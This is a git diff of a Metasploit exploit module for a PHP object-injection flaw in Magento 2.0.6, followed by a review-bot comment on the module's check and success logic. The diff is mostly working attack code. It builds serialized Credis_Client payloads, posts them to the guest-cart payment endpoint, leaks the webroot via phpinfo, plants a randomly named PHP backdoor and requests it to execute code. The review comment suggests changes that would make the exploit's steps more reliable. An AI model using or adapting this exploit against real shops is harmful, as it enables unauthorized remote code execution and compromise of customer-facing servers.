Cosmetic changes for magento_unserialize to pass msftidy & guidelines
parent
4f42cc8c08
commit
7c9227f70b
|
@ -13,16 +13,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Magento <= 2.0.6 Unserialize Remote Code Execution',
|
||||
'Name' => 'Magento 2.0.6 Unserialize Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a PHP object injection vulnerability in Magento <= 2.0.6
|
||||
This module exploits a PHP object injection vulnerability in Magento 2.0.6
|
||||
or prior.
|
||||
},
|
||||
'Platform' => 'php',
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Author' =>
|
||||
[
|
||||
'Netanel Rubin', # original discovery
|
||||
'agix', # original exploit
|
||||
'mr_me <mr_me@offensive-security.com>', # metasploit module
|
||||
'mr_me <mr_me[at]offensive-security.com>', # metasploit module
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
|
@ -36,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
|
||||
],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Targeting', { 'auto' => true } ],
|
||||
],
|
||||
'DisclosureDate' => 'May 17 2016',
|
||||
|
@ -48,6 +51,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def print_good(msg='')
|
||||
super("#{peer} - #{msg}")
|
||||
end
|
||||
|
||||
def get_phpinfo
|
||||
# uses the Magento_Framework_DB_Transaction class
|
||||
serialize = 'O:13:\"Credis_Client\":22:{'
|
||||
|
@ -149,7 +156,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
|
||||
serialize << 's:11:\"\u0000*\u0000requests\";'
|
||||
serialize << 'i:0;}'
|
||||
return serialize
|
||||
|
||||
serialize
|
||||
end
|
||||
|
||||
def get_phpshell
|
||||
|
@ -252,14 +260,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
|
||||
serialize << 's:11:\"\u0000*\u0000requests\";'
|
||||
serialize << 'i:0;}'
|
||||
return serialize
|
||||
|
||||
serialize
|
||||
end
|
||||
|
||||
def do_check
|
||||
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
|
||||
data << get_phpinfo
|
||||
data << "\"}},\"email\":\"#{@email}\"}"
|
||||
return send_request_cgi({
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
|
||||
'ctype' => 'application/json',
|
||||
|
@ -293,16 +303,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
rescue ::Rex::ConnectionError => e
|
||||
vprint_error(e.message)
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def get_webroot
|
||||
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
|
||||
data << get_phpinfo
|
||||
data << "\"}},\"email\":\"#{@email}\"}"
|
||||
|
||||
# we steal path via phpinfo
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
|
@ -310,11 +323,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'ctype' => 'application/json',
|
||||
'data' => data,
|
||||
})
|
||||
if res and res.code == 200
|
||||
|
||||
if res && res.code == 200
|
||||
@webroot = "#{$1}" if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/
|
||||
return true
|
||||
end
|
||||
return false
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
def create_fake_cart
|
||||
|
@ -325,10 +340,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'cookie' => @cookies,
|
||||
'vars_get' => { 'form_key' => @form_key }
|
||||
})
|
||||
if (res and res.body.include?('[]'))
|
||||
return true
|
||||
end
|
||||
return false
|
||||
|
||||
return true if (res && res.body.include?('[]'))
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
def generate_cart_id
|
||||
|
@ -337,27 +352,29 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'uri' => normalize_uri(target_uri.path, '/checkout/cart/'),
|
||||
'cookie' => @cookies,
|
||||
})
|
||||
if res and res.code == 200
|
||||
if res && res.code == 200
|
||||
@guest_cart_id = "#{$1}" if res.body =~ /entity_id":"(.*)","store_id":\d,"created_at/
|
||||
return true
|
||||
end
|
||||
return false
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
def backdoor
|
||||
data = "{\"paymentMethod\":{\"method\":\"checkmo\",\"additional_data\":{\"additional_information\":\""
|
||||
data << get_phpshell
|
||||
data << "\"}},\"email\":\"#{@email}\"}"
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
|
||||
'ctype' => 'application/json',
|
||||
'data' => data,
|
||||
})
|
||||
if (res && res.body.include?('true'))
|
||||
return true
|
||||
end
|
||||
return false
|
||||
|
||||
return true if (res && res.body.include?('true'))
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
def exec_code
|
||||
|
@ -366,21 +383,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'uri' => normalize_uri(target_uri.path, "/#{@backdoor}"),
|
||||
}, timeout = 0.5)
|
||||
end
|
||||
|
||||
def exploit
|
||||
define_globals
|
||||
@backdoor = "#{Rex::Text.rand_text_alphanumeric(26)}.php"
|
||||
register_files_for_cleanup("#{@backdoor}")
|
||||
if create_fake_cart && generate_cart_id
|
||||
print_good("generated a guest cart id")
|
||||
if get_webroot
|
||||
if backdoor
|
||||
if get_webroot && backdoor
|
||||
print_good("backdoor done!")
|
||||
exec_code
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
=begin
|
||||
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/sam.rc
|
||||
[*] Processing scripts/sam.rc for ERB directives.
|
||||
|
|
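Review bot: The rescue added in the `-293,16 +303,19` hunk (`rescue ::Rex::ConnectionError => e`, `vprint_error(e.message)`, `return Exploit::CheckCode::Safe`) reports the target as Safe when the connection fails, but a connection error gives no evidence about the Magento version or its unserialize handling; the honest result there is `return Exploit::CheckCode::Unknown`, leaving `Safe` only for the fall-through after the response was actually inspected. The enclosing check method starts above this hunk, so the response checks that precede its three `end` lines are not visible here. The same optimistic success shows in the `-310,11` and `-337,27` hunks: `get_webroot` and `generate_cart_id` return true whenever `res.code == 200`, even when the `=~` capture did not match, which leaves `@webroot` or `@guest_cart_id` nil for the request that follows; `return true if @webroot` (and `return true if @guest_cart_id`) would make the caller's `&&` chain in `exploit` stop at the right step.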